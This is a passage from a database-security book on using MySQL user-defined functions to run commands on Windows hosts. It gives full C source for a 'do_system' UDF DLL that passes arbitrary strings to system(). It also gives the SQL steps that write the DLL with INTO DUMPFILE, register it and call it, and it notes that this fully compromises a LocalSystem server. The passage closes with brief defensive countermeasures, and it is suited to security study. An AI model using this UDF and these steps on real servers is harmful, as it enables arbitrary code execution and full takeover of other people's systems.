User-Defined Functions in Windows

In Windows, placing the library file somewhere the server will load it from is significantly easier because the default DLL search order on most versions of Windows includes the current working directory of the process. This was another factor that contributed to the ability of the W32/Sdbot.worm.gen.j worm to gain control of Windows hosts.

If you create a file like this:

 -- INTO DUMPFILE writes the value's raw bytes with no escaping or line terminator; a relative path is resolved against the server's current working directory
 mysql> select 0x010203 into dumpfile '123.dll'; 

a file named 123.dll containing the three bytes 0x01 0x02 0x03 is created in the MySQL data directory, which is the server process's current working directory (a relative path given to INTO DUMPFILE is resolved against it).

All you need now is a suitable Windows UDF DLL. The source code for a simple "system" UDF follows. It is C++ (the extern "C" linkage keeps the exported symbol names unmangled so that CREATE FUNCTION ... SONAME can resolve them), and on MSVC the export decoration is spelled __declspec(dllexport):

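 #include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Minimal MySQL UDF that hands its single string argument to the C runtime's
 * system(): a shell-command primitive for a MySQL account holding the FILE and
 * CREATE FUNCTION privileges. It is deliberately dangerous; there is no command
 * validation because arbitrary execution in the server's security context is
 * the whole point of the example.
 *
 * The enum and struct layouts below mirror MySQL's UDF definitions (4.x era) so
 * the DLL builds without the MySQL headers. NOTE(review): they are copied from
 * the original listing and must match the server build you target.
 */

/* MSVC needs __declspec(dllexport) to export the symbol; other toolchains export by default. */
#ifdef _WIN32
#define UDF_EXPORT __declspec(dllexport)
#else
#define UDF_EXPORT
#endif

enum Item_result { STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT };

typedef struct st_udf_args {
    unsigned int arg_count;        /* Number of arguments */
    enum Item_result *arg_type;    /* Pointer to item_results */
    char **args;                   /* Pointer to argument */
    unsigned long *lengths;        /* Length of string arguments */
    char *maybe_null;              /* Set to 1 for maybe_null args */
} UDF_ARGS;

typedef struct st_udf_init {
    char maybe_null;               /* 1 if function can return NULL */
    unsigned int decimals;         /* for real functions */
    unsigned long max_length;      /* For string functions */
    char *ptr;                     /* free pointer for function data */
    char const_item;               /* 0 if result is independent of arguments */
} UDF_INIT;

#ifdef __cplusplus
extern "C" {
#endif

/*
 * do_system(cmd): run cmd through system() and return the string "Success".
 *
 * initid  - per-call UDF state. initid->ptr receives the heap buffer that holds
 *           the result so do_system_deinit() can release it.
 * args    - must carry exactly one STRING_RESULT argument. MySQL hands string
 *           arguments over as a pointer plus lengths[i] and does not guarantee a
 *           NUL terminator, so the bytes are copied into a terminated buffer
 *           before they reach system() (the original passed args[0] straight
 *           through and could read past the end of the argument).
 * result  - MySQL's scratch buffer; unused, the result is heap allocated.
 * length  - set to strlen("Success") (7). The original reported 8, i.e. it
 *           counted the NUL terminator as part of the returned value.
 * is_null - untouched on success.
 * error   - set to 1 and NULL returned on a bad argument list or on allocation
 *           failure (the original also leaked its buffer on the argument check).
 *
 * The command's exit status is ignored, exactly as in the original: the caller
 * sees "Success" whether or not the shell actually ran the command.
 *
 * NOTE(review): each row allocates a fresh result buffer and overwrites
 * initid->ptr, so only the last one is released by do_system_deinit(). Whether
 * ptr starts out NULL is not established by this listing, so the previous value
 * is not freed here; an xxx_init() that allocates once would be the clean fix.
 */
UDF_EXPORT char *do_system(UDF_INIT *initid, UDF_ARGS *args, char *result,
                           unsigned long *length, char *is_null, char *error)
{
    (void)result;
    (void)is_null;

    /* Validate before allocating anything so the failure path leaks nothing. */
    if (args == NULL || args->arg_count != 1 ||
        args->arg_type == NULL || args->arg_type[0] != STRING_RESULT ||
        args->args == NULL || args->args[0] == NULL || args->lengths == NULL) {
        *error = 1;
        return NULL;
    }

    /* Copy exactly lengths[0] bytes and terminate: the argument may not be NUL-terminated. */
    unsigned long cmd_len = args->lengths[0];
    char *cmd = (char *)malloc(cmd_len + 1);
    if (cmd == NULL) {
        *error = 1;
        return NULL;
    }
    memcpy(cmd, args->args[0], cmd_len);
    cmd[cmd_len] = '\0';

    /* Intentional arbitrary command execution under the mysqld service account. */
    system(cmd);
    free(cmd);

    static const char msg[] = "Success";
    char *buff = (char *)malloc(sizeof msg);
    if (buff == NULL) {
        *error = 1;
        return NULL;
    }
    memcpy(buff, msg, sizeof msg);

    *length = (unsigned long)(sizeof msg - 1);   /* 7: the NUL is not part of the value */
    initid->ptr = buff;                          /* released by do_system_deinit() */
    return buff;
}

/*
 * Release the result buffer that do_system() stored in initid->ptr.
 * free(NULL) is a no-op, so no guard is needed; ptr is reset so a repeated
 * deinit cannot double free.
 */
UDF_EXPORT void do_system_deinit(UDF_INIT *initid)
{
    free(initid->ptr);
    initid->ptr = NULL;
}

#ifdef __cplusplus
}
#endif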

If you compile this DLL to be as small as possible (in tests, it was possible using the DLL version of the runtime library and the /Opt:NoWin98 linker flag to create UDF DLLs as small as 4KB), you then have all of the pieces you need to run arbitrary code on a Windows system, given a MySQL account with the FILE privilege and the right to create functions (the MySQL root account by default).

A script of the following form writes a file named test_udf.dll into the current working directory of MySQL, registers the exported symbol as a UDF, and calls it so that a directory listing is written to the file foo.txt in the MySQL data directory:

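 -- The hex literal is the complete contents of the compiled test_udf.dll; INTO DUMPFILE writes it byte-for-byte
select 0x<hex-encoded contents of test_udf.dll> into dumpfile 'test_udf.dll';
-- Bind the DLL's exported do_system symbol as a string-returning UDF
create function do_system returns string soname 'test_udf.dll';
-- Invoke it (the original listing omitted the function name in this call)
select do_system('dir > foo.txt');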

This technique works in Windows versions of MySQL up to and including version 4.1.9, and is likely to work for quite some time. Because the MySQL service on Windows runs as the LocalSystem account by default, it is straightforward to then fully compromise the Windows host. To recap, the privileges you needed to do this are FILE (file_priv) and the ability to CREATE FUNCTION. For defenders, the corresponding countermeasures are: run mysqld under a dedicated low-privilege service account rather than LocalSystem, grant FILE and CREATE FUNCTION only to administrative accounts, and on later releases restrict where INTO DUMPFILE may write with secure_file_priv and rely on the requirement that UDF libraries be loaded only from plugin_dir.



Database Hacker's Handbook. Defending Database Servers